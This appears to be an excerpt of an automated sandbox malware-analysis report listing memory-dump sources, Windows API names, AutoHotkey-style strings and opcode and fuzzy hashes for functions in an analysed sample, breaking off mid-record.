                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ClipboardCloseCountGlobalMessagePeekTickUnlock_errno_invalid_parameter_noinfo
                            • String ID: ahk_group
                            • API String ID: 3495366681-1905535906
                            • Opcode ID: 47ed002c1cfb8fd22f0a6c47f81526549c3b7e33e3c3d2ff48cbec5b37f452a3
                            • Instruction ID: 8356ccc7eca21de094a521e1a5df97db06c56df3de194ce9d9265a4f8ed8c1a1
                            • Opcode Fuzzy Hash: 47ed002c1cfb8fd22f0a6c47f81526549c3b7e33e3c3d2ff48cbec5b37f452a3
                            • Instruction Fuzzy Hash: 44D16B32605B4086EB6B8B27E8403EA27A1F74DBD4F594116EB99477F9DB38C881C741
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_errno_invalid_parameter_noinfo
                            • String ID: CSV
                            • API String ID: 130734711-2651001053
                            • Opcode ID: da9c5deefa4da5a1134f71f1d8619eb23c1d41c163f7a8435eba7ded7b6a137f
                            • Instruction ID: 2688e86073e93982a699b87ea9918b52c7525f954c5c37f5e71567ca75bde2d6
                            • Opcode Fuzzy Hash: da9c5deefa4da5a1134f71f1d8619eb23c1d41c163f7a8435eba7ded7b6a137f
                            • Instruction Fuzzy Hash: B4B15E76605B448AEB678B27E8803EA77A1F74DBD4F140116EB9D87BB4DB38D881C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID: Target label does not exist.
                            • API String ID: 1623861271-2507343300
                            • Opcode ID: b1ab25adb716a0340ef1acb592c6e6afda6ab95ef0c66e87294ced97402eb644
                            • Instruction ID: 6c4aa3b4639a1d5b6c564e42c8e5f623f04f37a10ff2788b33068944f47b3f27
                            • Opcode Fuzzy Hash: b1ab25adb716a0340ef1acb592c6e6afda6ab95ef0c66e87294ced97402eb644
                            • Instruction Fuzzy Hash: DDB18B32205B4485FB6B8B2BE8847EA27A1F74DBE4F550116EB9947AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID: Parameter #4 invalid.
                            • API String ID: 1623861271-2921795276
                            • Opcode ID: 3483005053c314ee9448fd2db6387cdc1c16f771e4bd3309f19a79656cddea83
                            • Instruction ID: 7f91fe8d357328212043f1c478c7fa81a1cce7258ec385919f0ef88df1e43d0a
                            • Opcode Fuzzy Hash: 3483005053c314ee9448fd2db6387cdc1c16f771e4bd3309f19a79656cddea83
                            • Instruction Fuzzy Hash: C2A14D32205B4486EB6B8B27E8907DA77A1F74DBE4F540116EB9A47BF5DB38C881C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID: Parameter #1 invalid.
                            • API String ID: 1623861271-1208927624
                            • Opcode ID: 485a2810ade87809526e0fed66b171340546cdec0d0a94dfeec7b759600275e0
                            • Instruction ID: b22c8198679ed27f25c45896b9bef3f2e1047a73a02d4717c7e775b785140715
                            • Opcode Fuzzy Hash: 485a2810ade87809526e0fed66b171340546cdec0d0a94dfeec7b759600275e0
                            • Instruction Fuzzy Hash: 48916D32605B4086FB6B8B27E8847EA27A1F74DBE4F544116FB5987AF5DB38C881C701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID: Target label does not exist.
                            • API String ID: 1623861271-2507343300
                            • Opcode ID: 0b1c5d94bcc1ee1b2cc0673c84cfb5f580d17ec7af2a49d259f278cca100095f
                            • Instruction ID: 3c9554a7e96362e474684c4a2768a9baf587521b7d5b6d890f893d3d76f2c67d
                            • Opcode Fuzzy Hash: 0b1c5d94bcc1ee1b2cc0673c84cfb5f580d17ec7af2a49d259f278cca100095f
                            • Instruction Fuzzy Hash: 16915D32205B4486FB6B8B27E8947EA37A1F74DBE4F544116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_errno_invalid_parameter_noinfo
                            • String ID: wait
                            • API String ID: 130734711-2112783333
                            • Opcode ID: cfdc58c5c1d86d38e6d197e4285b4617dd04a7951504c16df2b135ed9e56d378
                            • Instruction ID: ab10cf76678df420bd5cb944e17acc7e6ec8049d2c95b5e58abc3f8164135dbe
                            • Opcode Fuzzy Hash: cfdc58c5c1d86d38e6d197e4285b4617dd04a7951504c16df2b135ed9e56d378
                            • Instruction Fuzzy Hash: D5915D32205B4086FB6B8B27E8947EA27A1F74DBE4F544116EB5987AF5DB38C881C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID: Parameter #1 invalid.
                            • API String ID: 1623861271-1208927624
                            • Opcode ID: f3a0084907fdf496f6069cdcab8dedb9c6cda81da478f81307276f8b9a81688b
                            • Instruction ID: 5f917e5f9eed0118f4772fe798e01b4792cc4cdb735169b72913a342033e3a12
                            • Opcode Fuzzy Hash: f3a0084907fdf496f6069cdcab8dedb9c6cda81da478f81307276f8b9a81688b
                            • Instruction Fuzzy Hash: 97916032205B4486FB6B8B27E8947EA77A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID: Parameter #1 invalid.
                            • API String ID: 1623861271-1208927624
                            • Opcode ID: 69066ea0afccdf161f2a4a6e1e8d20877589cff7d5846ff4fab92852a39cd617
                            • Instruction ID: 81503c843bda96a4a9b9690e1a14783a1a6a37368d814f393435404b700c874b
                            • Opcode Fuzzy Hash: 69066ea0afccdf161f2a4a6e1e8d20877589cff7d5846ff4fab92852a39cd617
                            • Instruction Fuzzy Hash: B6916E32604B4086FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID: Parameter #1 invalid.
                            • API String ID: 1623861271-1208927624
                            • Opcode ID: cccc8919cd833b724c0b4bb460faf1aed356b64bf518494188e299f36ff91e03
                            • Instruction ID: 27f0d2b2536f7ae8327940aefa12de3b2ef7e62cf4e921e1a03cfba8d8569a96
                            • Opcode Fuzzy Hash: cccc8919cd833b724c0b4bb460faf1aed356b64bf518494188e299f36ff91e03
                            • Instruction Fuzzy Hash: 1F916032604B4086FB6B8B27E8847DA77A1F74DBE4F540116EB59876F5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_errno_invalid_parameter_noinfo
                            • String ID: Play
                            • API String ID: 130734711-4273697156
                            • Opcode ID: 3d6cd329b5d4322a4f63678cd0b51bf45b303f297bea6bf5f16e109594ff221e
                            • Instruction ID: 12851c55ac5caea8c166e50b30e0f281397511af0dbbc2a0359b1dc76102153b
                            • Opcode Fuzzy Hash: 3d6cd329b5d4322a4f63678cd0b51bf45b303f297bea6bf5f16e109594ff221e
                            • Instruction Fuzzy Hash: A9915F32605B4086FB6B8B27E8947EA77A1F74DBE4F540116EB5A876F5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CharCountTick$ClipboardCloseGlobalLowerMessagePeekUnlockUpper
                            • String ID:
                            • API String ID: 1737845391-0
                            • Opcode ID: 7362d222cebdd38f2d739f5e234c45a54e2baa680bd3fd5f9060ea79a78f9d1d
                            • Instruction ID: f2c7ba8a3fb529d5529facef342be71f7b36f03593b8a07a970d59670173accf
                            • Opcode Fuzzy Hash: 7362d222cebdd38f2d739f5e234c45a54e2baa680bd3fd5f9060ea79a78f9d1d
                            • Instruction Fuzzy Hash: 78C19C32604B4486FB6B9B27E8443EA37A1F74DBE4F584116EB99476F5DB38C881C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$Window$ClipboardCloseDestroyGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 2997888913-0
                            • Opcode ID: 0ec8b069243763e48540ff6d3ddca3c90bbe2c12598bf9879c82c20d765e755a
                            • Instruction ID: 30a4810449e38f64f4e3e02c81c1029f1459c2517becafd056da4f243c70b8c5
                            • Opcode Fuzzy Hash: 0ec8b069243763e48540ff6d3ddca3c90bbe2c12598bf9879c82c20d765e755a
                            • Instruction Fuzzy Hash: 33916131205B4486FB6B8B27E8947EA37A1F74DBE4F540116EB5A87AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ClipboardCloseCountGlobalInfoTickUnlock
                            • String ID:
                            • API String ID: 3668674636-0
                            • Opcode ID: d24e3bf629f89a62b0214e498b40238a0b917bdde64c829970bf3bb5b7d05730
                            • Instruction ID: c3c03c921349736552ea586482c5f0f1521cba1a049343202ca1b2e1d80cf69a
                            • Opcode Fuzzy Hash: d24e3bf629f89a62b0214e498b40238a0b917bdde64c829970bf3bb5b7d05730
                            • Instruction Fuzzy Hash: 5ED15C72605B8089EB778F26E8807DA37A1F74DBA4F144216EB594BBF4DB38C581C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID:
                            • String ID: ErrorLevel$Illegal parameter name.$Out of memory.$The following %s name contains an illegal character:"%-1.300s"$_$#@$variable
                            • API String ID: 0-1002950332
                            • Opcode ID: 71cb25ac8e0d07c7e2bdc0be22cf78a25a7776a512e7910d2d350893a54fc722
                            • Instruction ID: 056f9b7a8832be69c6e7cb07896756fe6756976e83625657fda0af2b626d2206
                            • Opcode Fuzzy Hash: 71cb25ac8e0d07c7e2bdc0be22cf78a25a7776a512e7910d2d350893a54fc722
                            • Instruction Fuzzy Hash: 20C18D32245BC586EBA69B16E0803E973A5F78C7C4F54011AEB8D07BB9DF39C895C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CloseCountTick$ClipboardGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 4107439908-0
                            • Opcode ID: a461ee21d68325edf7a4b14607d5073baa93315347f6983b7060975a5149e5e1
                            • Instruction ID: 9bb7ca58932839f51475ddd3aab94a5c8fd56fcf4854f063fb8b95d62f0a2c78
                            • Opcode Fuzzy Hash: a461ee21d68325edf7a4b14607d5073baa93315347f6983b7060975a5149e5e1
                            • Instruction Fuzzy Hash: 72B16D36605B448AEB678B27E8847EA77A1F74DBD4F140116EB9D87BB4DB38C881C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Close$CountTick$ClipboardCreateErrorGlobalLastMessagePeekUnlock
                            • String ID:
                            • API String ID: 2674141723-0
                            • Opcode ID: fcea701a1957fe7c7010537808d3662c79a156260bb55be193bce92fc611b973
                            • Instruction ID: 7f206223a661d7a85bfb56804f1888599b093f127f3440b3130ea2e55cc67d7f
